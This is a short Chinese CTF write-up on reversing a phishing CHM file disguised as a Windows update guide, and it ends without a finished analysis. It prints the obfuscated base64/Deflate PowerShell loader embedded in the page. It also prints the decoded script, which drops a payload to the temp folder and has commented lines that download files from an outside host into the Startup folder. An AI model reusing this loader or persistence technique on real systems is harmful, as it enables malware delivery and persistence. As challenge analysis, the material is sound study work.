查壳需要CHM解包器(CHMUnpacker),解压出三个文件
doc.hhc和doc1.htm没发现什么,doc.html发现了一段powershell代码,JavaScript中点击触发,结合标题Check for Windows updates from Command Line,所以这是钓鱼网页
解密powershell中间的base64,得到
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nZFda8IwFIbvB/6HUCsom7HthrMdu3B+gDCnWIcXyxhpe9SONgnp0eq/X2sr2/VyGd485zl5m8QMkxgEkmciIO/K4BtCJP45Q0jpGyDdQDC6JJ4aN81rmo5lLhLJo2mcQNvYIyqv17Ndh9r9Ae271HZcb2BZVi+GRO4kVWJn3BHDBHH0CrLqOZZj3bv2I8VUGZ1/ob/W86XtlNjWuz9ZLVeL6ex10mJDpcYcOVtJnsZix+ZxqGUmt8g2sYhknjEfuUYyB3FgSy13mqf13UGxPSQKNA04llqlmAYekW1h07gxQymw+q2P2YKWip+etyoCwyRZwwnbhqnyiEUypOE+LQlmHJ3sIn99SmcigtNi2zZO9anmmNXgv0n/EGSoixXaFeSWDDq1QylQlzSS4ggaC4+plukLz6D/4NfPKuaF7wN2R7X9bw+s7MG2HefSQzWadCcilFEBIMEZi61/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
直接base64解密中间,得到乱码
调试IO.Compression.DeflateStream,解压缩
在powershell当前目录下读取doc.chm的内容,然后在系统/temp目录下生成20201122.tmp
# $client = new-object System.Net.WebClient;
# $client.DownloadFile("http://192.168.69.129:8000/ielogo.png", "$env:temp/20203917.tmp")
# $client.DownloadFile("http://192.168.69.129:8000/_TMP12", "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.bat")
# read file
$content = [IO.File]::ReadAllText("$pwd\doc.chm")
$idx1 = $content.IndexOf("xxxxxxxx")
$helper = $content.Substring($idx1 + 8)
$cont = [System.Convert]::FromBase64String($helper)
Set-Content "$env:temp\20201122.tmp" $cont -Encoding byte
创建一个ps1脚本把当前的代码保存进去,将题目下载的challenge改名为doc.chm,运行ps1脚本,去本地temp目录找到20201122.tmp
20201122.tmp拖入ida分析,32位才有函数出来,大部分函数坏了,数量不多,逐个看下去没找到main函数,头有问题得修复一下
修复不好,毁灭吧
标签:tmp,reverse,temp,doc,CTF,html,IO,20201122,Compression From: https://www.cnblogs.com/blackicelisa/p/16655645.html